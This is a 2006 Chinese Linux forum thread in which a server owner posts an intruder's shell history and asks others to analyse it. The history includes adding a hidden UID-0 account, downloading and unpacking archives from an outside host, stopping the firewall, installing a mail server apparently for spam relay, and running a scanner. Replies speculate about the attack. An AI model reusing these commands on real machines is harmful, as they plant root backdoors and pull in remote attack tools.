免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 操作系统 Linux系统管理 我得服务器被黑了,看看老外都干了什么!!
12345678下一页
最近访问板块 发新帖
查看: 38392 | 回复: 77
打印 上一主题 下一主题

我得服务器被黑了,看看老外都干了什么!! [复制链接]

firer2000

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2006-05-26 17:13 |只看该作者 |倒序浏览
我得服务器被老外黑了!!因为密码太简单,自己玩的服务器,被黑无所谓,但是大家分析分析他都干了什么,下面是他打的命令:

427  w
  428  ifconfig
  429  adduser rc -u 0 -o -g 0
  430  passwd rc
  431  php -v
  432  netstat -nat
  433  cd /var/www/html/
  434  ls -la
  435  wget http://md-host.net/db/SignIn.tar.gz
  436  tar zxf SignIn.tar.gz
  437  netstat -nat
  438  w
  439  cd /var/tmp/
  440  wget ftp://rpmfind.net/linux/fedora/c ... xim-4.43-1.i386.rpm
  441  rpm -ivh exim-4.43-1.i386.rpm
  442  rpm -qa |grep exim
  443  rpm -e exim-mon-4.43-1.RHEL4.3
  444  rpm -e exim-sa-4.43-1.RHEL4.3
  445  rpm -e exim-doc-4.43-1.RHEL4.3
  446  rpm -e exim-4.43-1.RHEL4.3
  447  rpm -ivh exim-4.43-1.i386.rpm
  448  netstat -nat
  449  hostname
  450  /etc/init.d/exim start
  451  netstat -natp
  452  ifconfig
  453  php -v
  454  mkdir .~
  455  cd .~
  456  wget http://md-host.net/db/s.tar.gz
  457  tar zxf s.tar.gz
  458  ls- la
  459  ls -la
  460  rm -rf s.tar.gz
  461  mcedit system.php
  462  export LANG=c
  463  mcedit bla.txt
  464  mcedit list.txt
  465  cat >i
  466  hostname -F i
  467  /etc/init.d/exim start
  468  /etc/init.d/exim restart
  469  adduser kyle
  470  su kyle
  471  /etc/init.d/iptables stop
  472  netstat -natp
  473  kill -9 6683
  474  kill -9 2120
  475  kill -9 1811
  476  kill -9 2100
  477  kill -9 2334
  478  kill -9 2334
  479  kill -9 1382
  480  kill -9 2389
  481  kill -9 23010
  482  netstat -natp
  483  /etc/init.d/mysqld stop
  484  /etc/init.d/exim restart
  485  su kyle
  486  rpm -e sendmail-doc-8.13.1-2
  487  rpm -e sendmail-devel-8.13.1-2
  488  rpm -e sendmail-cf-8.13.1-2
  489  ifconfig
  490  php -f system.php
  491  netstat -natp
  492  w
  493  netstat -nat
  494  netstat -natp
  495  cd /var/tmp/
  496  ls -la
  497  cd .~
  498  ls -la
  499  rm -rf i
  500  hostname
  501  w
  502  passwd
  503  cd /var/named/
  504  ls -la
  505  cd chroot/var/named/
  506  ls -la
  507  mail
  508  mail csergiu@gmail.com
  509  /etc/init.d/spamassassin stop
  510  rpm -qa |grep spamassassin
  511  rpm -e spamassassin-3.0.1-0.EL4
  512  rpm -e spamassassin-3.0.1-0.EL4 --nodeps
  513  rpm -e evolutio
  514  rpm -qa |grep evolution-2.0.2-16.i386
  515  rpm -qa |grep evolution
  516  rpm -e evolution-devel-2.0.2-16
  517  rpm -e evolution-data-server-1.0.2-7
  518  rpm -e evolution-data-server-1.0.2-7 --nodeps
  519  rpm -e evolution-2.0.2-16
  520  rpm -e evolution-2.0.2-16 --nodeps
  521  rpm -e evolution-connector-2.0.2-5
  522  rpm -e evolution-webcal-1.0.10-1
  523  rpm -e evolution-data-server-devel-1.0.2-7
  524  /etc/init.d/exim restart
  525  mail csergiu@gmail.com
  526  ifconfig
  527  ifconfig
  528  cd /var/tmp/
  529  cd .~
  530  rm -rf *
  531  wget http://md-host.net/db/kidu.tgz
  532  tar zxf kidu.tgz
  533  ls -la
  534  rm -rf kidu.tgz
  535  touch bios.txt uniq.txt vuln.txt viln.txt
  536  ./go.b 221.220
  537  cd /opt
  538  la
  539  ls

大家一起分析一下!
firer2000

论坛徽章:
0
2 [报告]
发表于 2006-05-26 17:14 |只看该作者
关键是我的系统现在打env这样的命令会提示

Segmentation fault


不知道是他如何弄的!
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
boyhyc

论坛徽章:
0
3 [报告]
发表于 2006-05-26 17:29 |只看该作者
恐怖
哈哈
还有哦 你怎么知道是老外 ?

[ 本帖最后由 boyhyc 于 2006-5-26 17:34 编辑 ]
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
ports

论坛徽章:
0
4 [报告]
发表于 2006-05-26 17:43 |只看该作者
好像是建立一个mail的中转站吧,
adduser rc -u 0 -o -g 0

这一招黑,佩服
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
yttlovezxx

论坛徽章:
0
5 [报告]
发表于 2006-05-26 17:51 |只看该作者
牛人。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
barterr

论坛徽章:
0
6 [报告]
发表于 2006-05-26 17:57 |只看该作者
鬼鬼祟祟,一边干坏事,一边w.
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
77902543

论坛徽章:
0
7 [报告]
发表于 2006-05-26 19:33 |只看该作者
他是远程登陆执行的命令吧?
我远程登陆注销以后,再登陆就找不到以前执行过的命令了,history只能记录在控制台执行的命令
这是怎么把他所输入的命令全部都保存下来的啊?~`
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
soway

论坛徽章:
0
8 [报告]
发表于 2006-05-26 20:48 |只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
anson_x

论坛徽章:
0
9 [报告]
发表于 2006-05-26 21:32 |只看该作者
高手啊
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
寂寞烈火

论坛徽章:
1
荣誉会员 日期:2011-11-23 16:44:17
10 [报告]
发表于 2006-05-26 21:58 |只看该作者
这个"黑客"水平一般~,看上述操作,按理说,应该是获得了root权限~,可是他的操作不是尽善尽美的~最起码他没清楚history~,而且他对cmdline似乎不太精通~ 瞎猜测的`~,人家的水平,我估计N年也达不到`
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
12345678下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP